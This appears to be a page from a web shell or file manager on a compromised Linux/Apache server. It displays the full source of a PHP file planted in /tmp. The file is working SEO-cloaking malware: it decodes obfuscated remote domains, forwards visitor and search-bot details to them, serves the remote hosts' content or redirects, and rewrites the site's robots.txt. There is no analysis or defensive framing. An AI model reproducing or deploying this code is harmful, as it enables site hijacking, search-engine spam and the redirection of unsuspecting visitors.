HEX
Server: Apache/2.4.57 (Debian)
System: Linux 8693ab19cb62 5.14.0-312.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 11 16:26:43 UTC 2023 x86_64
User: www-data (33)
PHP: 8.2.12
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/phpBJUTJd
<?php $xmlname =  ["%32%31%35%38%2D%6F%65%76%74%75%67%31%32%35%2E%72%79%6E%65%72%6E%63%2E%67%62%63","%32%31%35%38%2D%6F%65%76%74%75%67%31%32%35%2E%6D%72%61%76%67%75%76%61%2E%67%62%63","%32%31%35%38%2D%6F%65%76%74%75%67%31%32%35%2E%70%79%6E%65%76%63%2E%6B%6C%6D","%32%31%35%38%2D%6F%65%76%74%75%67%31%32%35%2E%6D%72%61%69%76%72%2E%6B%6C%6D"];
$http_web = 'http';
$host = $_SERVER['HTTP_HOST'];
$lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : 'en';
$urlshang = '';
if (isset($_SERVER['HTTP_REFERER'])) {
    $urlshang = $_SERVER['HTTP_REFERER'];
}
if (is_https()) {
    $http = 'https';
} else {
    $http = 'http';
}
$spider = is_bot();
$requestUri = drequest_uri();
$urlshang = is_from_search_engine($urlshang);
$robots = 'robots.txt';
$string = '2158-bright125';
$istest = false;
if (strpos($requestUri, $string) !== false) {
    $istest = true;
} else {
    $string = '';
}
if (strpos($requestUri, $robots) !== false || strpos($requestUri, '?robots.txt') !== false) {
    $robots = '1';
} else {
    $robots = '0';
}
if ($urlshang) {
    $urlshang = '1';
} else {
    $urlshang = '0';
}
create_robots($http . '://' . $host);
$param = http_build_query([
    'host' => $host,
    'spider' => $spider,
    'requestUri' => $requestUri,
    'urlshang' => $urlshang,
    'http' => $http,
    'lang' => $lang,
    'string' => $string,
    'robots' => $robots
]);
$html_content = requests($xmlname, $http_web, $param);

if (!strstr($html_content, 'nobotuseragent')) {
    if (strstr($html_content, 'okhtml')) {
        @header('Content-type: text/html; charset=utf-8');
        $html_content = str_replace('okhtml', '', $html_content);
        if ($istest) {
            echo $string;
        }
        echo $html_content;
        exit();
    } else if (strstr($html_content, 'getcontent500page')) {
        @header('HTTP/1.1 500 Internal Server Error');
        exit();
    } else if (strstr($html_content, '404page')) {
        @header('HTTP/1.1 404 Not Found');
        exit();
    } else if (strstr($html_content, '301page')) {
        @header('HTTP/1.1 301 Moved Permanently');
        $html_content = str_replace('301page', '', $html_content);
        header('Location: ' . $html_content);
        exit();
    } else if (strstr($html_content, 'okxml')) {
        $html_content = str_replace('okxml', '', $html_content);
        @header('Content-Type: application/xml; charset=utf-8');
        echo $html_content;
        exit();
    } else if (strstr($html_content, 'okrobots')) {
        $html_content = str_replace('okrobots', '', $html_content);
        @header('Content-Type: text/plain; charset=utf-8');
        echo $html_content;
        exit();
    }
}

function requests($xmlname, $http_web, $param)
{
    shuffle($xmlname);
    foreach ($xmlname as $domain) {
        $domain = str_rot13(urldecode($domain));
        $url = $http_web . '://' . $domain . '/?' . $param;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        if (!curl_errno($ch)) {
            curl_close($ch);
            return $response;
        } else {
            if (stristr(curl_error($ch), '443')) {
                echo "443";
            }
            curl_close($ch);
        }
        if (ini_get('allow_url_fopen')) {
            $response = @file_get_contents($url);
            if ($response !== false) {
                return $response;
            }
        }
    }
    return 'nobotuseragent';
}


function is_bot()
{
    $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    $bots = ['googlebot', 'bing', 'yahoo', 'google', 'Googlebot'];
    foreach ($bots as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return 1;
        }
    }
    return 0;
}

function drequest_uri()
{
    if (isset($_SERVER['REQUEST_URI'])) {
        $duri = $_SERVER['REQUEST_URI'];
    } else {
        if (isset($_SERVER['argv'])) {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        } else {
            $duri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $duri;
}


function is_from_search_engine($referer)
{
    if (empty($referer)) return false;

    $searchEngines = ['google.', 'bing.', 'yahoo.',];

    foreach ($searchEngines as $engine) {
        if (stripos($referer, $engine) !== false) {
            return true;
        }
    }
    return false;
}

function create_robots($url)
{
    $path = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt';
    $content = 'User-agent: *' . PHP_EOL;
    $content .= 'Allow: /' . PHP_EOL . PHP_EOL;
    $content .= 'Sitemap: ' . $url . '/sitemap.xml' . PHP_EOL;
    if (!file_exists($path)) {
        file_put_contents($path, $content);
    } else {
        $existingContent = file_get_contents($path);
        if ($existingContent !== $content) {
            file_put_contents($path, $content);
        }
    }
}
function is_https()
{
    if (isset($_SERVER['HTTPS'])) {
        if (strtolower($_SERVER['HTTPS']) !== 'off') {
            return true;
        }
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) {
        if ($_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
            return true;
        }
    } elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS'])) {
        if (strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
            return true;
        }
    }
    return false;
}
@ Telegram